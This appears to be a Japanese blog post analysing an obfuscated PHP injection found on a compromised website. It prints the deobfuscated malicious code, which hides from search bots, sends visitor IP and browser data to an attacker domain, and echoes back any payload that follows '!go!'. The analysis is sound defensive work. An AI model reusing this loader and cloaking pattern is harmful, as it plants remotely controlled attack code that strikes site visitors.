eval( function evalWEMBIkqYOIIGcLBn($s) {return @file_get_contents($s);} );

となるので、 file_get_contents でどこからかファイルを取得するようだ。

$evalgKgHOXrDzX = $dd0();
 //この$dd0() に難読化された攻撃者のサーバドメイン名が入る。
if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {
 //ユーザエージェントが検索ボットだったら何もしない。もしくは、「stats」という名前のCookieをユーザが持っている場合でも何もしない。
} else {
 //それ以外の場合はこちらが実行される。
@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800);
 //「stats」という名前でCookieをセット。
$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));

これを解析すると http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=&b=&h= が返ってくる。
これをブラウザからアクセスすると

http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=210.224.***.***&b=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_7_2%29+AppleWebKit%2F535.7+%28KHTML%2C+like+Gecko%29+Chrome%2F16.0.912.75+Safari%2F535.7&h=isidai.sakura.ne.jp
 となる。(IPアドレスは伏せました)

これを file_get_contents している。

 if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
 // strstr(,'!go!')

おそらく攻撃者のサーバが !go! の含んだレスポンスを返すと攻撃が実行される。

 $evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
 $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];

攻撃者サーバが返してくるレスポンス内容の!go!から後ろ側のコードが代入される。

echo $evalsssgqulVBTkZLAch;

上記で代入された攻撃コードがブラウザに出力され攻撃が行われる。

}
 }

ということで、複雑に難読されたコードもやってることはfile_get_contentsで攻撃コードを取りに行って出力…というものでした。検索ボット避けがしてあったりもしましたが、基本はシンプルな攻撃ですね。

マジ疲れたOTL

Pocket

You Might Also Like